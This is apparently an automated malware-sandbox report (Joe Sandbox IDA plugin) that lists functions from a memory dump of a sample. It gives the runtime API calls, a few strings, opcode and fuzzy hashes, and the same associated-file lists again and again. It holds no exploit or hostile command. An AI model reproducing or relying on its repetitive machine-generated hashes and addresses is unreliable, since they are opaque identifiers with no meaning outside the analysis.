                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2791304714-0
                                                                                                                                                                                                                                              • Opcode ID: 9abeccfa6d69c7db2b90d6ddad73a12d8f1932070bdc2e495de8662c2b7b4296
                                                                                                                                                                                                                                              • Instruction ID: 50be0149b44c5b038fc6529ae5611c865e7db5ef9c423ff5d8fcc26a5bedb603
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9abeccfa6d69c7db2b90d6ddad73a12d8f1932070bdc2e495de8662c2b7b4296
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 243117B1900744AFCB60CF69C480A8AFBF4FB18314F54996ED85A97B41D775E608CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE7750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CEE7761
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,?), ref: 6CEE7782
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000018), ref: 6CEE7796
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000018), ref: 6CEE77CE
                                                                                                                                                                                                                                              • QueueUserWorkItem.KERNEL32(6CF01D50,00000000,00000010), ref: 6CEE780C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 584243675-0
                                                                                                                                                                                                                                              • Opcode ID: 11b072d2ca783461c7d59de105479b39e00dddc179187587e73463a1ef3af611
                                                                                                                                                                                                                                              • Instruction ID: eeb7c1fa02276f4c678d5090e2585d3c7d37c373d1a5cae32fdb56424c88eceb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11b072d2ca783461c7d59de105479b39e00dddc179187587e73463a1ef3af611
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5321A172502308AFDB40CF65D844BDBBBF8FB59349F60895DE55687A41D730E648CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED5AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CED5ACB
                                                                                                                                                                                                                                                • Part of subcall function 6CF39533: std::exception::_Copy_str.LIBCMT ref: 6CF3954E
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED5ABC
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED5AE0
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CED5B18
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED5B2D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 921928366-0
                                                                                                                                                                                                                                              • Opcode ID: 85e3b405d8361160a3d080b0782b784627eb18e93014835d30a522f8a97edeee
                                                                                                                                                                                                                                              • Instruction ID: 0f0731ee6bdca3272675e0f29d31c1894c597176b19affc2880e51aa59db5c99
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85e3b405d8361160a3d080b0782b784627eb18e93014835d30a522f8a97edeee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93012DB28102187FDB04DFA5D8419DE77B8EF64244F448159E909A7A00EF30E7188BE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3F047
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __getptd_noexit.LIBCMT ref: 6CF3EAE9
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __amsg_exit.LIBCMT ref: 6CF3EAF6
                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 6CF3F067
                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 6CF3F077
                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6CF3F094
                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(05B31658), ref: 6CF3F0BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4271482742-0
                                                                                                                                                                                                                                              • Opcode ID: f6723c9d6e5811d44b92b32d8b179f69e82e2bf6cbcf36483a8d20dcc074495d
                                                                                                                                                                                                                                              • Instruction ID: 92d55ac9b54fd8f261828b013b012b414b882df44a35b168e84bbcddc5dd393e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6723c9d6e5811d44b92b32d8b179f69e82e2bf6cbcf36483a8d20dcc074495d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD018072E02631BBDF919BA984057DE7770BF05718F116185E82CA7F80CB38A959CBE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3F7C8
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __getptd_noexit.LIBCMT ref: 6CF3EAE9
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __amsg_exit.LIBCMT ref: 6CF3EAF6
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3F7DF
                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 6CF3F7ED
                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 6CF3F7FD
                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 6CF3F811
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                              • Opcode ID: b3b780dc29364a7f9d749142bee87f111a0c5806963fee88f03d737a31d59abe
                                                                                                                                                                                                                                              • Instruction ID: 350719f2a5c760e9e7915f4b999afce62c8551157f2d8ac4545b27e4f8c7e5cb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3b780dc29364a7f9d749142bee87f111a0c5806963fee88f03d737a31d59abe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF09632945334BBDBA5ABB89409BCD37A06F0072CF206159D45C96BC0DB2459498AE5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF1E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memcpy_s
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2001391462-3916222277
                                                                                                                                                                                                                                              • Opcode ID: f8354b85f82b1f5b8aa0916d7113e10ba31aaa7bfe3155da6e116725e1b06d61
                                                                                                                                                                                                                                              • Instruction ID: de72f84fb77a80d4b9112db5df939c5dc7c5573964b48cab5372cdb11569eb14
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8354b85f82b1f5b8aa0916d7113e10ba31aaa7bfe3155da6e116725e1b06d61
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5C17D756093028FE704CF29C89466AB7E5FFC9318F144A2DE496C7E50E771EA49CB82
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF38B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memcpy_s_memmove_memset
                                                                                                                                                                                                                                              • String ID: EncodingParameters
                                                                                                                                                                                                                                              • API String ID: 4034675494-55378216
                                                                                                                                                                                                                                              • Opcode ID: d8c4c51a56bc4eef298901cdedd6235415905f65157d493bb919238cafab5832
                                                                                                                                                                                                                                              • Instruction ID: b657fa05d7661c3ff05952b59e2197b74a34d4c1ce3d521cdda96cb0e0e320fa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8c4c51a56bc4eef298901cdedd6235415905f65157d493bb919238cafab5832
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF918BB0609381AFD701CF28C880B5BBBE5AFD9748F144A1EF89887351D775E949CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF11200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF2D820: _memmove.LIBCMT ref: 6CF2D930
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF113D4
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                                • Part of subcall function 6CF08D80: _malloc.LIBCMT ref: 6CF08D8A
                                                                                                                                                                                                                                                • Part of subcall function 6CF08D80: _malloc.LIBCMT ref: 6CF08DAF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • : ciphertext length of , xrefs: 6CF112E4
                                                                                                                                                                                                                                              • doesn't match the required length of , xrefs: 6CF11316
                                                                                                                                                                                                                                              • for this key, xrefs: 6CF11348
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: doesn't match the required length of $ for this key$: ciphertext length of
                                                                                                                                                                                                                                              • API String ID: 1025790555-2559040249
                                                                                                                                                                                                                                              • Opcode ID: fe6540da7c319f1582e4c51e813375eaad471f93acfd446b06840927c29e9368
                                                                                                                                                                                                                                              • Instruction ID: 62ea45d4a1390f402f4c3fb3de93d2fe8298ef861132367c8699c946e8814080
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe6540da7c319f1582e4c51e813375eaad471f93acfd446b06840927c29e9368
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FA14D715083809FD324CB69D890BDBB7E9AFD9304F148A1DE19D83751EB70A908CBA3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3B47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 6CF3B50D
                                                                                                                                                                                                                                                • Part of subcall function 6CF41AA0: __87except.LIBCMT ref: 6CF41ADB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                                              • API String ID: 2905807303-2276729525
                                                                                                                                                                                                                                              • Opcode ID: 85e858ac23cbf2929e3a31885f78467bac62e2eab454a943b6310c752f025297
                                                                                                                                                                                                                                              • Instruction ID: cdef4b5df8db2b537c6054d7168e695c33c906d5311d4e4f30477b601d8c2696
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85e858ac23cbf2929e3a31885f78467bac62e2eab454a943b6310c752f025297
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80519F31F1DA05A2C741AB14CD2039B3FB4DB41719F20DE58D4D942AAAEB34C4E48BD6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE8560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __cftoe.LIBCMT ref: 6CEE88ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF3A116: __mbstowcs_s_l.LIBCMT ref: 6CF3A12C
                                                                                                                                                                                                                                              • __cftoe.LIBCMT ref: 6CEE8911
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
